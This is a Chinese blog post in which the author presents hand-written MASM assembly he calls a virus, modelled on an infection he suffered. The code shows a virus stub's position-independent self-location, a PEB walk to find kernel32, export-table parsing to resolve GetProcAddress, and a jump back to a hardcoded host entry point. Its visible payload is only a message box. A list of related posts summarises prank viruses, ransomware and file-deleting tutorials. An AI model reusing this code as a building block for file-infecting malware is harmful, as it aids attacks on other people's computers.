自己写的小病毒

最新推荐文章于 2024-08-02 00:56:41 发布
最新推荐文章于 2024-08-02 00:56:41 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: 汇编 文章标签: 汇编 user include byte c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/aspbasicer/article/details/291846
版权

前年写的病毒,当时中了劳拉病毒,然后我照的它写了一个,参考了好多资料,主要是386汇编和PE文件结构的资料,个人感觉汇编什么的不是很难,当时我还不太熟悉宏汇编,不然可以有更简洁的代码
.486
      .model flat, stdcall
      option casemap :none
include /MASM32/INCLUDE/windows.inc
.code
start:
  call pstart
pstart:
  pop ebx       ;mov ebx,dword ptr [esp]
  sub ebx,offset pstart   ;//ebx为重定位信息,现在应该是0
  push ebp      ;//保存程序开始时的EBP
  mov ebp,esp
  sub esp,80h     ;//根据变量改变40h
  mov dword ptr [ebp-4],ebx  ;//保存到Pbase
;///getKernelBase///
  mov eax, ss:[30h]
  test eax,eax
  js loc1
  mov eax, dword ptr [eax + 0Ch]
  mov esi, dword ptr [eax + 1Ch]
  lodsd           
  mov eax, dword ptr [eax+8]
  jmp loc2
loc1:
  mov eax,dword ptr [eax+34h]
  mov eax,dword ptr [eax+0B8h]
loc2:
  mov dword ptr [ebp-10h],eax
  push ebp      ;//保存变量表指针EBP
  mov ebp,eax        ;//ebp=Kbase
;///Get GetProcAddress's EnterPoint//
  mov eax,dword ptr [ebp+3Ch]
  mov edx,dword ptr [ebp+eax+120]
  add edx,ebp
  mov ecx,dword ptr [edx+24]  ;//number
  mov ebx,dword ptr [edx+28]  ;// at=esp+4
  push dword ptr [edx+32]  ;//npt=esp
;
   mov edi,esp
            sub edi,10h
  mov dword ptr [edi],50746547h
  mov dword ptr [edi+4],41636f72h       ; 要改
  mov dword ptr [edi+8],65726464h
  mov dword ptr [edi+0Ch],00007373h  
;
findstart:
  dec ecx
  xor edx,edx
  mov esi,dword ptr [esp]
  add esi,ebp
  mov esi,dword ptr [esi]
  add esi,ebp
cmpbyte:
  lodsb
  cmp al,byte ptr [edi+edx]
  jne notsame
  cmp edx,14
  je find
  inc edx
  loop cmpbyte
  jmp cantfind
notsame:
  add dword ptr [esp],4
  add ebx,4
  jmp findstart
cantfind:
  xor eax,eax
  jmp findend
find:
  add ebx,ebp
  mov eax,dword ptr[ebx]
  add eax,ebp
findend:
  add esp,4
  pop ebp       ;//pop出变量表指针
  mov dword ptr [ebp-0Ch],eax  ;//保存GetProcAddress的函数入口点
;/
  mov ebx,dword ptr [ebp-4]
  mov edx,offset LoadLibrary    ;//LoadLibrary
  add edx,ebx
  push edx
  push dword ptr [ebp-10h]
  call dword ptr [ebp-0Ch]    ;//获得LoadLibrary的地址
  mov dword ptr [ebp-14h],eax

  mov edx,offset USER32     ;//user32.dll
  add edx,ebx 
  push edx
  call eax        ;//调用LoadLibrary

  mov edx,offset messagebox     ;//user32.dll
  add edx,ebx

  push edx
  push eax
  call dword ptr [ebp-0Ch]   ;//获得MessageBoxA的地址

  push 0
  push edx
  push edx
  push 0
  call eax
  
  nop
  nop

;//
  add esp,80h     ;//根据变量改变40h
  pop ebp
  jmp pend
;
LoadLibrary:
            db "LoadLibraryA",0
USER32:
            db "user32.dll",0
messagebox:
  db "MessageBoxA",0
pend:
  mov eax,0041c560h   ;//转到正常的程序入口点
  jmp eax 
  nop
  nop
  nop
  nop
  nop
  nop
  nop

end start

Python实现小病毒
sk6584631_sz的博客
07-17 5752
qwq
用C++一个简单小病毒(零基础奶妈级教学,不可能学完还不懂)
foxifigo0的博客
07-18 1万+
C++简单病毒讲解:8行代码一个小病毒,3秒卡死电脑!零基础教学
病毒
weixin_52050936的博客
03-16 186
import os def func(path, n): lst = os.listdir(path) for name in lst: real_path = os.path.join(path, name) if os.path.isdir(real_path): print("|---"*n + name) func(real_path, n+1) else: pr
如何一个简单的病毒程序
Chinawash 专栏
06-25 6363
引:前些天学病毒这门技术着实吃了很多苦头,走了很多弯路,尽管按我的知识水平,病毒已经是水到渠成的学习内容了。但是我现在学了入门才发现这门技术实际 上隐藏着很多玄机,包含着许多技术,不专门学习研究根本无法达到“牛”的境界上去。如今了这篇文章,介绍的都是相当实用的东西,可以让你少走许多弯路 (有时侯一个错误够你找几个小时的)。不过需要些基础知识才能看懂。假如你有天知识储备够了,不学学病毒将是你的遗憾
好笑,一个病毒
凡人凡居
08-23 2401
一个病毒 这是答案,我只能淡淡的笑,这是什么卵.搞死别人就是病毒了?while (1){int *p = new int[10000000];}
教你一个简单实用的病毒
qq_36916968的博客
12-08 2841
首先,打开记事本,输入 Const strPassword = “sigaide”’ Dim WshNetwork Set WshNetwork = CreateObject(“WScript.Network”) Dim userName userName = WshNetwork.userName&",user" Dim Domain Set Domain = GetObject(“Wi...
自己动手病毒—ELF文件病毒
02-01
【自己动手病毒—ELF文件病毒】 在深入探讨如何编ELF文件病毒之前,我们需要先理解ELF文件格式的基本概念。ELF(Executable and Linkable Format)是Linux和其他类UNIX系统中广泛使用的二进制文件格式,用于可...
用python制作勒索病毒_用c一个小勒索病毒(用B站来学习)
weixin_39743414的博客
11-30 3204
前言:这里是根据B站上的一个视频,看着教学的,一下是我对代码的分块解析记录,方便想入门病毒和反病毒小工具的人学习。准备vc++2013b站学习视频新建项目我就是一开始新建项目都不清楚,原来一直用devc++image.png需要注意的是这里的配置配置2代码编部分1.思路1>遍历指定目录或当前目录下所有文件(这里用到了递归查询)2>对指定文件加密2.对单个文件进行加密如何对文件加密,那个老师讲...
简单的小病毒
11-05
【标题】"简单的小病毒"涉及的是计算机病毒的基础知识,主要关注的是病毒的编和传播机制,以及如何利用编程语言实现这一过程。在这个特定的例子中,病毒是使用Visual C++(VC)编的,这是一种广泛使用的C++集成...
如何用Python病毒
热门推荐
zhugezuoyuan的博客
06-17 3万+
如何用Python病毒–USB病毒篇 人生苦短,我用Python! hello 大家好!我是Mark,一个姓马名克的中国人。 最近呢,又有小伙伴问Mark了,“Mark,你会不会病毒呀!”,我一听完,愣了一下,问他:“病毒干啥?” “哎呀,没什么,我只是想试一下而已” “喝,这简单!” 没错,这确实很简单。 所以,今天Mark就跟大家分享一下,如何通过Python一个病毒 (注意一下,今天分享的这个病毒会删除文件,谨慎使用,这里分享只供学习交流) 一、环境搭建 本程序用Python编,不会
第三篇:利用命令行一个小病毒(无限弹窗,关机,重启)
最新发布
打铁还需自身硬
08-02 1310
其实原理很简单。
教你们用C++一个超级小病毒
Marcusscdn的博客
01-28 341
运行结果是有一个弹窗,点了忽略或取消就会改密码、死机,按中止就结束了。还是老样子,直接上代码!
简短的计算机病毒,最简单的电脑病毒
weixin_34471838的博客
07-14 1万+
大家知道最简单的电脑病毒是什么吗?下面就让学习啦小编教大家做一个最简单的电脑病毒吧。最简单的电脑病毒的做法1.控制面板->文件资源管理器选项->查看->隐藏已知文件夹类型的扩展名,如果前面勾选了就取消勾选,没有勾选就不用管。2.新建一个文本文档,重命名为后缀为vbs的文件,如果第一步没有完成也就无法修改文件名的后缀。3.右键vbs文件编辑,现在可以开始正式编代码了。doset ...
html病毒,用bat的一个小病毒
weixin_42312133的博客
06-15 1105
用了三天才看完=。=,感觉作者整理整理可以把博客当书买了。。。然后自己突发其想,想到了一个小病毒程序,其实也算不上病毒,只能算是个恶作剧程序吧,其原理就是不断打开cmd程序,占用系统资源。。。呵呵。。让大神见笑了=。=windows.batstart cmd%0用户打开这个程序之后,程序就会不断打开cmd,占用系统资源,导致系统瘫痪。%0是再次执行该程序的意思。但是,这样只能让用户死机一次。。。。...
病毒(恶作剧)与小宏病毒的学习
weixin_50464560的博客
03-17 2015
1、编病毒,运用rar自解压功能完成病毒植入。 第一个小病毒 咱来编一下 双击运行之 来了来了它来了,幸好设置的时间比较长,不然就来不及关掉它了~ 如果要制作小病毒(恶作剧),可以设置成1s,放在别人的主机里运行,我是不知道会不会被打,因为我没试过哦嘻嘻 在cmd中敲上这个命令,它就没了 第二个小病毒 敲它 双击运行 其实它们都是C盘啦 那么如何删除呢 来 这就删除了 这里拓展一下 多了”@echo off”这一语句,这里就不会像之前那样显示那么多了。”@echo off”的意思是在
用Python编个小病毒
cgy091107的博客
02-11 2179
python 病毒
python小病毒
tico2011的博客
11-11 790
Python小病毒
python简单的病毒编程代码,如何用python做恶搞病毒
Bxwfjdjdbdgj的博客
03-10 1138
def take_photoes(self): while True: time.sleep(10) # 图片路径,同时带上路径+时间 photo_path = r'%s/%s.jpeg' % (self.base_dir, time.strftime('%Y-%m-%d_%H_%M_%S')) cap = None try: # VideoCapture()中第一个参数是摄像头标号,默认情况电脑自带摄像头索引为0,外置为1.2.3…然后服务器套接字继续处于监听,接收其他客户端套接字的连接请求。
制作一个简单的python病毒
imsfd的博客
05-18 819
大家都知道电脑病毒,有的人会想着自己做一个病毒,那到底怎么做,用任何编程语言都可以做一个比较简单的病毒,那用python该怎么做?:是一个死循环,就是在while循环里,每次条件都成立,一直运行下级代码:输出'病毒来袭'字符串,新建窗口。先导入OS库,因为os库里有很多系统命令,例如。一直循环,直到电脑报废才结束。
如何用python病毒
06-01
对于这个问题,我必须强调,编和传播计算机病毒是不道德和非法的行为,会对他人的计算机造成严重的损害和风险。因此,我不会提供任何有关如何编...你可以通过学习这些方面来提高自己的技能,而不是去编病毒
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值